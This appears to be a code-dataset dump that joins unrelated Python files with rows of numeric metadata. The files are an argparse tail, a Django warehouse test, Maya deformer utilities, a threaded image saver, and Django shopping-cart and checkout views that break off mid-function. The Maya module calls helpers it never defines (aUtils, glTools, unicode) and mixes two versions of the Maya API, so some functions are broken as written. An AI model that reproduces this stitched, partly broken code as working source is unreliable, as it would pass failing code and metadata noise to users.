g = p.add_mutually_exclusive_group(required=True)
g.add_argument("--seqs", nargs="+", help="All sequences to search for")
g.add_argument("--list", action="store_true", default=False,
help="Print non-unique indexes in the reference list")
p.add_argument("--ref", required=True, help="Reference text file containing"
" known index sequences")
p.add_argument("--rebuild", action="store_true", help="Don't use any cached"
" reference object")
p.add_argument("--length", type=int, choices=range(4,8), help="Set the "
"number of letters to consider, both in the query strings and "
"when building the reference")
main(p.parse_args())
| 33.152
| 80
| 0.602799
| 583
| 4,144
| 4.171527
| 0.329331
| 0.037418
| 0.019737
| 0.019737
| 0.127467
| 0.067434
| 0.067434
| 0
| 0
| 0
| 0
| 0.007571
| 0.266892
| 4,144
| 124
| 81
| 33.419355
| 0.792956
| 0.133446
| 0
| 0.072165
| 0
| 0
| 0.162661
| 0.012856
| 0
| 0
| 0
| 0.008065
| 0
| 1
| 0.092784
| false
| 0
| 0.072165
| 0.010309
| 0.226804
| 0.113402
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee721578168ba6c38ea84e55b427798b1b341a75
| 695
|
py
|
Python
|
warehouse/tests.py
|
thegangtechnology/thairod-django
|
b073186a4b5bc42dfef99685b3da30abf8e42862
|
[
"MIT"
] | null | null | null |
warehouse/tests.py
|
thegangtechnology/thairod-django
|
b073186a4b5bc42dfef99685b3da30abf8e42862
|
[
"MIT"
] | 3
|
2021-07-27T13:11:36.000Z
|
2021-08-10T22:54:55.000Z
|
warehouse/tests.py
|
thegangtechnology/thairod-django
|
b073186a4b5bc42dfef99685b3da30abf8e42862
|
[
"MIT"
] | null | null | null |
from django.urls import reverse
from address.models import Address
from core.tests import BaseTestSimpleApiMixin
from thairod.utils.test_util import APITestCase
from warehouse.models import Warehouse
class WarehouseAPITestCase(BaseTestSimpleApiMixin, APITestCase):
def setUp(self):
self.model = Warehouse
self.obj = Warehouse.objects.first()
self.address = Address.objects.first()
self.list_url = reverse('warehouse-list')
self.detail_url = reverse('warehouse-detail', kwargs={'pk': self.obj.pk})
self.valid_field = {
"name": "warehouse name",
"address": self.address.pk,
"tel": "0987654321",
}
| 31.590909
| 81
| 0.676259
| 76
| 695
| 6.131579
| 0.460526
| 0.051502
| 0.06867
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01845
| 0.220144
| 695
| 21
| 82
| 33.095238
| 0.841328
| 0
| 0
| 0
| 0
| 0
| 0.100719
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.294118
| 0
| 0.411765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee7343721934bb1607af511c0969882332910b83
| 24,456
|
py
|
Python
|
rsTools/utils/openMaya/deformer.py
|
robertstratton630/rigTools
|
cdc9530bf12ac46654860443c2c264fce619dbd0
|
[
"MIT"
] | null | null | null |
rsTools/utils/openMaya/deformer.py
|
robertstratton630/rigTools
|
cdc9530bf12ac46654860443c2c264fce619dbd0
|
[
"MIT"
] | null | null | null |
rsTools/utils/openMaya/deformer.py
|
robertstratton630/rigTools
|
cdc9530bf12ac46654860443c2c264fce619dbd0
|
[
"MIT"
] | null | null | null |
import maya.cmds as cmds
import re
import rsTools.utils.openMaya.dataUtils as dUtils
import maya.OpenMayaAnim as OpenMayaAnimOld
import maya.OpenMaya as OpenMayaOld
import maya.api.OpenMaya as om
import maya.api.OpenMayaAnim as oma
def isDeformer(deformer):
if not cmds.objExists(deformer):
return False
nodeType = cmds.nodeType(deformer, i=1)
if not nodeType.count('geometryFilter'):
return False
return True
'''
isDeformer("rig_normalPushq")
getDeformerList("pSphere1",nodeType='geometryFilter')
getDeformerFn("rig_normalPushq")
getDeformerSet("rig_normalPushq")
getDeformerSetFn("rig_normalPushq")
q = getDeformerSetMembers("rig_normalPushq")
p = getDeformerSetMemberStrList("rig_normalPushq")
s = getAffectedGeometry("rig_normalPushq")
weights = getWeights("rig_normalPushq")
'''
def getAttributes(deformer):
attrs = cmds.listAttr(deformer, k=True)
if "weightList.weights" in attrs:
attrs.remove("weightList.weights")
output = []
for a in attrs:
attr = str(deformer+"."+a)
val = cmds.getAttr(attr)
output.append([attr, val])
return output
def getAttributesAndConnections(deformer):
attrs = cmds.listAttr(deformer, k=True)
if "weightList.weights" in attrs:
attrs.remove("weightList.weights")
output = []
for a in attrs:
attr = str(deformer+"."+a)
val = cmds.getAttr(attr)
connections = cmds.listConnections(attr, s=True, d=False, p=True)
if connections:
output.append([attr, val, connections[0]])
else:
output.append([attr, val, None])
return output
def getDeformerList(affectedGeometry=[], nodeType='geometryFilter', regexFilter=''):
# Get Deformer List
deformerNodes = cmds.ls(type=nodeType)
if affectedGeometry:
if type(affectedGeometry) == str:
affectedGeometry = [affectedGeometry]
historyNodes = cmds.listHistory(
affectedGeometry, groupLevels=True, pruneDagObjects=True)
deformerNodes = cmds.ls(historyNodes, type=nodeType)
# Remove Duplicates
deformerNodes = aUtils.removeDuplicates(deformerNodes)
# Remove Tweak Nodes
tweakNodes = cmds.ls(deformerNodes, type='tweak')
if tweakNodes:
deformerNodes = [x for x in deformerNodes if not x in tweakNodes]
# Remove TransferAttributes Nodes
transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
if transferAttrNodes:
deformerNodes = [
x for x in deformerNodes if not x in transferAttrNodes]
if regexFilter:
reFilter = re.compile(regexFilter)
deformerNodes = filter(reFilter.search, deformerNodes)
return deformerNodes
def listMeshDeformers(mesh):
historyNodes = cmds.listHistory(
mesh, groupLevels=True, pruneDagObjects=True)
deformerNodes = cmds.ls(historyNodes, type="geometryFilter")
# remove tweak
deformerNodes = aUtils.removeDuplicates(deformerNodes)
tweakNodes = cmds.ls(deformerNodes, type='tweak')
if tweakNodes:
deformerNodes = [x for x in deformerNodes if not x in tweakNodes]
# remove transfer nodes
transferAttrNodes = cmds.ls(deformerNodes, type='transferAttributes')
if transferAttrNodes:
deformerNodes = [
x for x in deformerNodes if not x in transferAttrNodes]
return deformerNodes
def getDeformerFn(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
# Get MFnWeightGeometryFilter
deformerObj = dUtils.getMObject(deformer)
try:
deformerFn = oma.MFnGeometryFilter(deformerObj)
except:
raise Exception(
'Could not get a geometry filter for deformer "'+deformer+'"!')
return deformerFn
def getDeformerSet(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
if not isDeformer(deformer):
raise Exception('Object '+deformer+' is not a valid deformer!')
# Get Deformer Set
deformerObj = dUtils.getMObject(deformer)
deformerFn = oma.MFnGeometryFilter(deformerObj)
deformerSetObj = deformerFn.deformerSet
if deformerSetObj.isNull():
raise Exception('Unable to determine deformer set for "'+deformer+'"!')
# Return Result
return om.MFnDependencyNode(deformerSetObj).name()
def getDeformerSetFn(deformer):
# Checks
if not cmds.objExists(deformer):
raise Exception('Deformer '+deformer+' does not exist!')
# Get deformer set
deformerSet = getDeformerSet(deformer)
# Get MFnWeightGeometryFilter
deformerSetObj = dUtils.getMObject(deformerSet)
deformerSetFn = om.MFnSet(deformerSetObj)
# Return result
return deformerSetFn
def getDeformerSetMembers(deformer, geometry=''):
'''
Return the deformer set members of the specified deformer.
You can specify a shape name to query deformer membership for.
Otherwise, membership for the first affected geometry will be returned.
Results are returned as a list containing an MDagPath to the affected shape and an MObject for the affected components.
@param deformer: Deformer to query set membership for
@type deformer: str
@param geometry: Geometry to query deformer set membership for. Optional.
@type geometry: str
'''
# Get deformer function sets
deformerSetFn = getDeformerSetFn(deformer)
# Get deformer set members
deformerSetSel = deformerSetFn.getMembers(True)
# Get geometry index
if geometry:
geomIndex = getGeomIndex(geometry, deformer)
else:
geomIndex = 0
# Get number of selection components
deformerSetLen = deformerSetSel.length()
if geomIndex >= deformerSetLen:
raise Exception('Geometry index out of range! (Deformer: "'+deformer+'", Geometry: "' +
geometry+'", GeoIndex: '+str(geomIndex)+', MaxIndex: '+str(deformerSetLen)+')')
# Get deformer set members
data = deformerSetSel.getDagPath(geomIndex)
# Return result
return data
def getDeformerSetMemberStrList(deformer, geometry=''):
'''
Return the deformer set members of the specified deformer as a list of strings.
You can specify a shape name to query deformer membership for.
Otherwise, membership for the first affected geometry will be returned.
@param deformer: Deformer to query set membership for
@type deformer: str
@param geometry: Geometry to query deformer set membership for. Optional.
@type geometry: str
'''
# Get deformer function sets
deformerSetFn = getDeformerSetFn(deformer)
# Get deformer set members
deformerSetSel = om.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
# Convert to list of strings
setMemberStr = []
deformerSetSel.getSelectionStrings(setMemberStr)
setMemberStr = cmds.ls(setMemberStr, fl=True)
# Return Result
return setMemberStr
def getDeformerSetMemberIndices(deformer, geometry=''):
# Check geometry
geo = geometry
if cmds.objectType(geometry) == 'transform':
try:
geometry = cmds.listRelatives(
geometry, s=True, ni=True, pa=True)[0]
except:
raise Exception('Object "'+geo+'" is not a valid geometry!')
# Get geometry type
geometryType = cmds.objectType(geometry)
# Get deformer set members
deformerSetMem = getDeformerSetMembers(deformer, geometry)
# ==========================
# - Get Set Member Indices -
# ==========================
memberIdList = []
# Single Index
if geometryType == 'mesh' or geometryType == 'nurbsCurve' or geometryType == 'particle':
memberIndices = om.MIntArray()
singleIndexCompFn = om.MFnSingleIndexedComponent(deformerSetMem[1])
singleIndexCompFn.getElements(memberIndices)
memberIdList = list(memberIndices)
# Double Index
if geometryType == 'nurbsSurface':
memberIndicesU = om.MIntArray()
memberIndicesV = om.MIntArray()
doubleIndexCompFn = om.MFnDoubleIndexedComponent(deformerSetMem[1])
doubleIndexCompFn.getElements(memberIndicesU, memberIndicesV)
for i in range(memberIndicesU.length()):
memberIdList.append([memberIndicesU[i], memberIndicesV[i]])
# Triple Index
if geometryType == 'lattice':
memberIndicesS = om.MIntArray()
memberIndicesT = om.MIntArray()
memberIndicesU = om.MIntArray()
tripleIndexCompFn = om.MFnTripleIndexedComponent(deformerSetMem[1])
tripleIndexCompFn.getElements(
memberIndicesS, memberIndicesT, memberIndicesU)
for i in range(memberIndicesS.length()):
memberIdList.append(
[memberIndicesS[i], memberIndicesT[i], memberIndicesU[i]])
# Return result
return memberIdList
def getAffectedGeometry(deformer, returnShapes=False, fullPathNames=False):
# Verify Input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Initialize Return Array (dict)
affectedObjects = {}
# Get MFnGeometryFilter
deformerObj = dUtils.getMObject(deformer)
geoFilterFn = oma.MFnGeometryFilter(deformerObj)
# Get Output Geometry
outputObjectArray = geoFilterFn.getOutputGeometry()
dir(outputObjectArray)
# Iterate Over Affected Geometry
for i in range(len(outputObjectArray)):
# Get Output Connection at Index
outputIndex = geoFilterFn.indexForOutputShape(outputObjectArray[i])
outputNode = om.MFnDagNode(om.MObject(outputObjectArray[i]))
# Check Return Shapes
if not returnShapes:
outputNode = om.MFnDagNode(outputNode.parent(0))
# Check Full Path
if fullPathNames:
affectedObjects[outputNode.fullPathName()] = int(outputIndex)
else:
affectedObjects[outputNode.partialPathName()] = int(outputIndex)
# Return Result
return affectedObjects
def getGeomIndex(geometry, deformer):
'''
Returns the geometry index of a shape to a specified deformer.
@param geometry: Name of shape or parent transform to query
@type geometry: str
@param deformer: Name of deformer to query
@type deformer: str
'''
# Verify input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check geometry
geo = geometry
if cmds.objectType(geometry) == 'transform':
try:
geometry = cmds.listRelatives(
geometry, s=True, ni=True, pa=True)[0]
except:
raise Exception('Object "'+geo+'" is not a valid geometry!')
geomObj = dUtils.getMObject(geometry)
# Get geometry index
deformerObj = dUtils.getMObject(deformer)
deformerFn = oma.MFnGeometryFilter(deformerObj)
try:
geomIndex = deformerFn.indexForOutputShape(geomObj)
except:
raise Exception('Object "'+geometry +
'" is not affected by deformer "'+deformer+'"!')
# Retrun result
return geomIndex
def findInputShape(shape):
'''
Return the input shape ('...ShapeOrig') for the specified shape node.
This function assumes that the specified shape is affected by at least one valid deformer.
@param shape: The shape node to find the corresponding input shape for.
@type shape: str
'''
# Checks
if not cmds.objExists(shape):
raise Exception('Shape node "'+shape+'" does not exist!')
# Get inMesh connection
inMeshConn = cmds.listConnections(
shape+'.inMesh', source=True, destination=False, shapes=True)
if not inMeshConn:
return shape
# Check direct mesh (outMesh -> inMesh) connection
if str(cmds.objectType(inMeshConn[0])) == 'mesh':
return inMeshConn[0]
# Find connected deformer
deformerObj = dUtils.getMObject(inMeshConn[0])
if not deformerObj.hasFn(om.MFn.kGeometryFilt):
deformerHist = cmds.ls(cmds.listHistory(shape), type='geometryFilter')
if not deformerHist:
print('findInputShape.py: Shape node "'+shape +
'" has incoming inMesh connections but is not affected by any valid deformers! Returning "'+shape+'"!')
return shape
#raise Exception('Shape node "'+shape+'" is not affected by any valid deformers!')
else:
deformerObj = dUtils.getMObject(deformerHist[0])
# Get deformer function set
deformerFn = oma.MFnGeometryFilter(deformerObj)
# Get input shape for deformer
shapeObj = dUtils.getMObject(shape)
geomIndex = deformerFn.indexForOutputShape(shapeObj)
inputShapeObj = deformerFn.inputShapeAtIndex(geomIndex)
# Return result
return om.MFnDependencyNode(inputShapeObj).name()
def renameDeformerSet(deformer, deformerSetName=''):
'''
Rename the deformer set connected to the specified deformer
@param deformer: Name of the deformer whose deformer set you want to rename
@type deformer: str
@param deformerSetName: New name for the deformer set. If left as default, new name will be (deformer+"Set")
@type deformerSetName: str
'''
# Verify input
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check deformer set name
if not deformerSetName:
deformerSetName = deformer+'Set'
# Rename deformer set
deformerSet = cmds.listConnections(
deformer+'.message', type='objectSet')[0]
if deformerSet != deformerSetName:
deformerSetName = cmds.rename(deformerSet, deformerSetName)
# Retrun result
return deformerSetName
def getWeights(deformer, geometry=None):
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check Geometry
if not geometry:
geometry = getAffectedGeometry(deformer).keys()[0]
# Get Geometry Shape
geoShape = geometry
if geometry and cmds.objectType(geoShape) == 'transform':
geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
'''
weightList = []
vCount = cmds.polyEvaluate(geometry,v=True)
for i in range(vCount):
w = cmds.getAttr("{0}.weightList[0].weights[{1}]".format(deformer,i))
weightList.append(w)
'''
# get deformer set
defomerObjOLD = dUtils.getMObjectOld(deformer)
deformerFn = OpenMayaAnimOld.MFnGeometryFilter(defomerObjOLD)
deformerSetObj = deformerFn.deformerSet()
deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
deformerSetObj = dUtils.getMObjectOld(deformerSetName)
deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
deformerSetSel = OpenMayaOld.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
deformerSetPath = OpenMayaOld.MDagPath()
deformerSetComp = OpenMayaOld.MObject()
deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
# Get weights
deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(defomerObjOLD)
weightList = OpenMayaOld.MFloatArray()
deformerFn.getWeights(deformerSetPath, deformerSetComp, weightList)
# Return result
return list(weightList)
def setWeights(deformer, weights, geometry=None):
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Check Geometry
if not geometry:
geometry = getAffectedGeometry(deformer).keys()[0]
# Get Geometry Shape
geoShape = geometry
if geometry:
geoShape = cmds.listRelatives(geometry, s=True, ni=True)[0]
# Build weight array
weightList = OpenMayaOld.MFloatArray()
[weightList.append(i) for i in weights]
defomerObjOLD = dUtils.getMObjectOld(deformer)
# get deformer set
deformerFn = OpenMayaAnimOld.MFnGeometryFilter(defomerObjOLD)
deformerSetObj = deformerFn.deformerSet()
deformerSetName = OpenMayaOld.MFnDependencyNode(deformerSetObj).name()
deformerSetObj = dUtils.getMObjectOld(deformerSetName)
deformerSetFn = OpenMayaOld.MFnSet(deformerSetObj)
deformerSetSel = OpenMayaOld.MSelectionList()
deformerSetFn.getMembers(deformerSetSel, True)
deformerSetPath = OpenMayaOld.MDagPath()
deformerSetComp = OpenMayaOld.MObject()
deformerSetSel.getDagPath(0, deformerSetPath, deformerSetComp)
deformerFn = OpenMayaAnimOld.MFnWeightGeometryFilter(defomerObjOLD)
deformerFn.setWeight(deformerSetPath, deformerSetComp, weightList)
def bindPreMatrix(deformer, bindPreMatrix='', parent=True):
'''
Create a bindPreMatrix transform for the specified deformer.
@param deformer: Deformer to create bind pre matrix transform for
@type deformer: str
@param bindPreMatrix: Specify existing transform for bind pre matrix connection. If empty, create a new transform
@type bindPreMatrix: str
@param parent: Parent the deformer handle to the bind pre matrix transform
@type deformer: bool
'''
# Check deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
if not cmds.objExists(deformer+'.bindPreMatrix'):
raise Exception('Deformer "'+deformer +
'" does not accept bindPreMatrix connections!')
# Get deformer handle
deformerHandle = cmds.listConnections(deformer+'.matrix', s=True, d=False)
if deformerHandle:
deformerHandle = deformerHandle[0]
else:
raise Exception('Unable to find deformer handle!')
# Check bindPreMatrix
if bindPreMatrix:
if not cmds.objExists(bindPreMatrix):
bindPreMatrix = cmds.createNode('transform', n=bindPreMatrix)
else:
# Build bindPreMatrix transform
prefix = deformerHandle.replace(deformerHandle.split('_')[-1], '')
bindPreMatrix = cmds.createNode('transform', n=prefix+'bindPreMatrix')
# Match transform and pivot
cmds.xform(bindPreMatrix, ws=True, matrix=cmds.xform(
deformerHandle, q=True, ws=True, matrix=True))
cmds.xform(bindPreMatrix, ws=True, piv=cmds.xform(
deformerHandle, q=True, ws=True, rp=True))
# Connect inverse matrix to localize cluster
cmds.connectAttr(
bindPreMatrix+'.worldInverseMatrix[0]', deformer+'.bindPreMatrix', f=True)
# Parent
if parent:
cmds.parent(deformerHandle, bindPreMatrix)
# Return result
return bindPreMatrix
def pruneWeights(deformer, geoList=[], threshold=0.001):
'''
Set deformer component weights to 0.0 if the original weight value is below the set threshold
@param deformer: Deformer to removed components from
@type deformer: str
@param geoList: The geometry objects whose components are checked for weight pruning
@type geoList: list
@param threshold: The weight threshold for removal
@type threshold: str
'''
# Check deformer
if not cmds.objExists(deformer):
raise Exception('Deformer "'+deformer+'" does not exist!')
# Check geometry
if type(geoList) == str:
geoList = [geoList]
if not geoList:
geoList = cmds.deformer(deformer, q=True, g=True)
if not geoList:
raise Exception('No geometry to prune weight for!')
for geo in geoList:
if not cmds.objExists(geo):
raise Exception('Geometry "'+geo+'" does not exist!')
# For each geometry
for geo in geoList:
# Get deformer member indices
memberIndexList = getDeformerSetMemberIndices(deformer, geo)
# Get weight list
weightList = getWeights(deformer, geo)
# Prune weights
pWeightList = [wt if wt > threshold else 0.0 for wt in weightList]
# Apply pruned weight list
setWeights(deformer, pWeightList, geo)
def pruneMembershipByWeights(deformer, geoList=[], threshold=0.001):
'''
Remove components from a specified deformer set if there weight value is below the set threshold
@param deformer: Deformer to removed components from
@type deformer: str
@param geoList: The geometry objects whose components are checked for removal
@type geoList: list
@param threshold: The weight threshold for removal
@type threshold: str
'''
# Check deformer
if not cmds.objExists(deformer):
raise Exception('Deformer "'+deformer+'" does not exist!')
# Check geometry
if type(geoList) == str:
geoList = [geoList]
if not geoList:
geoList = cmds.deformer(deformer, q=True, g=True)
if not geoList:
raise Exception('No geometry to prune weight for!')
for geo in geoList:
if not cmds.objExists(geo):
raise Exception('Geometry "'+geo+'" does not exist!')
# Get deformer set
deformerSet = getDeformerSet(deformer)
# For each geometry
allPruneList = []
for geo in geoList:
# Get Component Type
geoType = glTools.utils.geometry.componentType(geo)
# Get Deformer Member Indices
memberIndexList = getDeformerSetMemberIndices(deformer, geo)
# Get Weights
weightList = getWeights(deformer, geo)
# Get Prune List
pruneList = [memberIndexList[i] for i in range(
len(memberIndexList)) if weightList[i] <= threshold]
for i in range(len(pruneList)):
if type(pruneList[i]) == str or type(pruneList[i]) == unicode or type(pruneList[i]) == int:
pruneList[i] = '['+str(pruneList[i])+']'
elif type(pruneList[i]) == list:
pruneList[i] = [str(p) for p in pruneList[i]]
pruneList[i] = '['+']['.join(pruneList[i])+']'
pruneList[i] = geo+'.'+geoType+str(pruneList[i])
allPruneList.extend(pruneList)
# Prune deformer set membership
if pruneList:
cmds.sets(pruneList, rm=deformerSet)
# Return prune list
return allPruneList
def clean(deformer, threshold=0.001):
'''
Clean specified deformer.
Prune weights under the given tolerance and prune membership.
@param deformer: The deformer to clean.
@type deformer: str
@param threshold: Weight value tolerance for prune operations.
@type threshold: float
'''
# Print Message
print('Cleaning deformer: '+deformer+'!')
# Check Deformer
if not isDeformer(deformer):
raise Exception('Object "'+deformer+'" is not a valid deformer!')
# Prune Weights
glTools.utils.deformer.pruneWeights(deformer, threshold=threshold)
# Prune Membership
glTools.utils.deformer.pruneMembershipByWeights(
deformer, threshold=threshold)
def checkMultipleOutputs(deformer, printResult=True):
'''
Check the specified deformer for multiple ouput connections from a single plug.
@param deformer: Deformer to check for multiple output connections
@type deformer: str
@param printResult: Print results to the script editor
@type printResult: bool
'''
# Check deformer
if not isDeformer(deformer):
raise Exception('Deformer "'+deformer+'" is not a valid deformer!')
# Get outputGeometry plug
outGeomPlug = glTools.utils.attribute.getAttrMPlug(
deformer+'.outputGeometry')
if not outGeomPlug.isArray():
raise Exception('Attribute "'+deformer +
'.outputGeometry" is not an array attribute!')
# Get existing indices
indexList = om.MIntArray()
numIndex = outGeomPlug.getExistingArrayAttributeIndices(indexList)
# Check output plugs
returnDict = {}
for i in range(numIndex):
plugConn = cmds.listConnections(
deformer+'.outputGeometry['+str(indexList[i])+']', s=False, d=True, p=True)
# Check multiple outputs
if len(plugConn) > 1:
# Append to return value
returnDict[deformer+'.outputGeometry[' +
str(indexList[i])+']'] = plugConn
# Print connection info
if printResult:
print('Deformer output "'+deformer+'.outputGeometry['+str(
indexList[i])+']" has '+str(len(plugConn))+' outgoing connections:')
for conn in plugConn:
print('\t- '+conn)
# Return result
return returnDict
| 33.45554
| 123
| 0.677257
| 2,505
| 24,456
| 6.608383
| 0.155689
| 0.011176
| 0.018606
| 0.011961
| 0.399964
| 0.362752
| 0.352906
| 0.342938
| 0.333756
| 0.301317
| 0
| 0.002334
| 0.22931
| 24,456
| 730
| 124
| 33.50137
| 0.875955
| 0.217697
| 0
| 0.44385
| 0
| 0
| 0.089999
| 0.001217
| 0.002674
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.018717
| 0
| 0.141711
| 0.016043
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee74b61615725492239c5444cd5387bf60c2f49c
| 804
|
py
|
Python
|
util/save_image_worker.py
|
zigonk/CMPC-Refseg
|
0d59c90e9968ed836c695976ff90081e1c24378a
|
[
"MIT"
] | null | null | null |
util/save_image_worker.py
|
zigonk/CMPC-Refseg
|
0d59c90e9968ed836c695976ff90081e1c24378a
|
[
"MIT"
] | null | null | null |
util/save_image_worker.py
|
zigonk/CMPC-Refseg
|
0d59c90e9968ed836c695976ff90081e1c24378a
|
[
"MIT"
] | null | null | null |
import logging
import os
from queue import Queue
from threading import Thread
from time import time
import cv2
class SaveThread(Thread):
def __init__(self, queue):
Thread.__init__(self)
self.queue = queue
def run(self):
while True:
# Get the work from the queue and expand the tuple
save_path, im = self.queue.get()
try:
cv2.imwrite(save_path, im)
finally:
self.queue.task_done()
class SaveImageWorker:
def __init__(self):
self.save_queue = Queue()
self.save_thread = SaveThread(self.save_queue)
self.save_thread.daemon = True
self.save_thread.start()
def save_image(self, save_path, im):
self.save_queue.put((save_path, im))
| 27.724138
| 62
| 0.609453
| 102
| 804
| 4.568627
| 0.352941
| 0.120172
| 0.085837
| 0.060086
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003604
| 0.309701
| 804
| 29
| 63
| 27.724138
| 0.836036
| 0.059701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.24
| 0
| 0.48
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
ee777920db42ef90f8ce8a58fb13a346a19081f4
| 7,444
|
py
|
Python
|
catalog/views.py
|
chancald/mask-ecommerce
|
1907007e726f989b6d99546e1b03ad5891d65715
|
[
"Apache-2.0"
] | null | null | null |
catalog/views.py
|
chancald/mask-ecommerce
|
1907007e726f989b6d99546e1b03ad5891d65715
|
[
"Apache-2.0"
] | null | null | null |
catalog/views.py
|
chancald/mask-ecommerce
|
1907007e726f989b6d99546e1b03ad5891d65715
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render, get_object_or_404, redirect
from django.contrib import messages
from django.utils import timezone
from django.views.generic import ListView, DetailView, View
from .models import Item, Order, OrderItem, Address, Promo
from .forms import AddressForm, PromoForm
from django.http import HttpResponseRedirect
from django.core.mail import send_mail
class HomeView(ListView):
model = Item
template_name = 'home.html'
class ProductDetail(DetailView):
model = Item
template_name = 'product.html'
class OrderSummaryView(View):
def get(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'order': order
}
return render(self.request, 'order_summary.html', context)
def add_to_cart(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
if order_qs.exists():
order = order_qs[0]
if order.items.filter(item__slug=item.slug).exists():
messages.success(request, f"{item.title} ya esta en el carrito")
return redirect('product', slug=slug)
else:
order.items.add(order_item)
order.save()
messages.success(request, f"{item.title} fue anadido al carrito")
return redirect('product', slug=slug)
else:
ordered_date = timezone.now()
order = Order.objects.create(user=request.user, ordered=False, ordered_date=ordered_date)
order.items.add(order_item)
order.save()
messages.success(request, f"{item.title} fue anadido al carrito")
return redirect('product', slug=slug)
def remove_from_cart(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
if order_qs.exists():
order = order_qs[0]
if order.items.filter(item__slug=item.slug).exists():
OrderItem.objects.filter(id=order_item.id).delete()
messages.warning(request, f"{item.title} fue eliminado del carrito")
return redirect('product', slug=slug)
else:
messages.warning(request, f"{item.title} no esta en el carrito")
return redirect('product', slug=slug)
else:
messages.warning(request, f"{item.title} no hay una orden activa")
return redirect('product', slug=slug)
def add_item_quantity(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_item.quantity += 1
order_item.save()
return redirect('order_summary')
def remove_item_quantity(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
order = order_qs[0]
if order_item.quantity > 1:
order_item.quantity -= 1
order_item.save()
else:
order.items.remove(order_item)
order.save()
messages.warning(request, f"{item.title} fue eliminado del carrito")
return redirect('order_summary')
def remove_from_cart_summary(request, slug):
item = get_object_or_404(Item, slug=slug)
order_item, created = OrderItem.objects.get_or_create(item=item, user=request.user, ordered=False)
order_qs = Order.objects.filter(user=request.user, ordered=False)
order = order_qs[0]
OrderItem.objects.filter(id=order_item.id).delete()
messages.warning(request, f"{item.title} el producto fue eliminado del carrito")
return redirect('order_summary')
class AfterCheckoutView(DetailView):
def get(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'order': order
}
return render(self.request, 'after_checkout.html', context)
class CheckoutView(View):
def get(self, *args, **kwargs):
form = AddressForm()
order = Order.objects.get(user=self.request.user, ordered=False)
context = {
'form': form,
'order': order,
}
return render(self.request, 'checkout.html', context)
def post(self, *args, **kwargs):
order = Order.objects.get(user=self.request.user, ordered=False)
form = AddressForm(self.request.POST or None)
context = {}
#promo_form = PromoForm(self.request.POST or None)
if 'submit_promo' in self.request.POST:
if form.is_valid():
promo_code = form.cleaned_data.get('promo_code')
promo = Promo.objects.filter(title=promo_code)
if promo:
order.promo.clear()
order.promo.add(promo[0])
order.save()
else:
order.promo.clear()
order.save()
messages.warning(self.request, f"{promo_code} no es un codigo valido de promoción")
if 'submit_info' in self.request.POST:
if form.is_valid():
first_name = form.cleaned_data.get('first_name')
last_name = form.cleaned_data.get('last_name')
phone = form.cleaned_data.get('phone')
email = form.cleaned_data.get('email')
street_address = form.cleaned_data.get('street_address')
street_address_2 = form.cleaned_data.get('street_address_2')
save_info = form.cleaned_data.get('save_info')
